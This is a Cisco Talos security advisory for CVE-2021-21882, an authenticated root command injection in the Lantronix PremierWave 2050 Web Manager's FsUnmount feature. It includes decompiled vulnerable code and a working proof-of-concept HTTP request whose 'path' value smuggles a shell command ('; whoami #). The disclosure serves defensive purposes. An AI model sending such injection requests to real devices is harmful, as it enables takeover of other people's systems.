Headline
CVE-2021-21882: TALOS-2021-1326 || Cisco Talos Intelligence Group
An OS command injection vulnerability exists in the Web Manager FsUnmount functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
Summary
An OS command injection vulnerability exists in the Web Manager FsUnmount functionality of Lantronix PremierWave 2050 8.9.0.0R4. A specially-crafted HTTP request can lead to arbitrary command execution. An attacker can make an authenticated HTTP request to trigger this vulnerability.
Tested Versions
Lantronix PremierWave 2050 8.9.0.0R4 (in QEMU)
Product URLs
https://www.lantronix.com/products/premierwave2050/
CVSSv3 Score
9.9 - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE
CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)
Details
PremierWave 2050 is an embedded Wi-Fi Module manufactured by Lantronix.
The PremierWave 2050 Web Manager interface allows an authenticated, but unprivileged, user to unmount USB mount points. This functionality is implemented using two exploitable system
calls to /sbin/ltrx_usb_umount
and mount
. The underlying commands are built using an unsanitized attacker-controlled HTTP parameter, path
. This command is executed with root privileges.
The relevant portion of the function responsible for handling the ajax function FsUnmount
is partially included below.
...
dir = get_param_by_name("dir");
path = get_param_by_name("path");
sprintf((char *)mount_point, "%s%s", "/ltrx_user", path);
if ( !IseUSB(path) ) [1]
{
cmd = sprintf_malloc("/sbin/ltrx_usb_umount '%s'", (const char *)mount_point); [2]
exec_system_cmd_print(cmd, 0, 0);
...
}
...
At position [1] there is a function call to IseUSB
which similarly relies on various system
calls out to secondary applications via system. The relevant portion of the IseUSB
function is included below.
int IseUSB(char* path) {
...
cmd = sprintf_malloc("mount 2>/dev/null | grep 'on %s type' | awk '{print $1}' | tr -d '\n'", a1);
exec_system_cmd_ex(cmd, &result, &num_bytes);
...
cmd = sprintf_malloc("e2label %s 2>/dev/null | tr -d '\n'", result);
...
exec_system_cmd_ex(v3, &result, num_bytes);
...
}
An attacker who submits a properly-formed HTTP path
parameter can escape two of the shell commands and execute arbitrary OS commands with root privileges.
POST / HTTP/1.1
Host: [IP]:[PORT]
Content-Length: 37
Authorization: Basic dXNlcjp1c2Vy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
ajax=FsUnmount&dir=/&path='; whoami #
The above HTTP request will cause the following commands to be executed with root privilege:
/sbin/ltrx_usb_umount ''; whoami #
mount 2>/dev/null | grep 'on '; whoami #
Timeline
2021-06-14 - Vendor Disclosure
2021-06-15 - Vendor acknowledged
2021-09-01 - Talos granted disclosure extension to 2021-10-15
2021-10-18 - Vendor requested release push to 2nd week of November. Talos confirmed final extension and disclosure date
2021-11-15 - Public Release
Discovered by Matt Wiseman of Cisco Talos.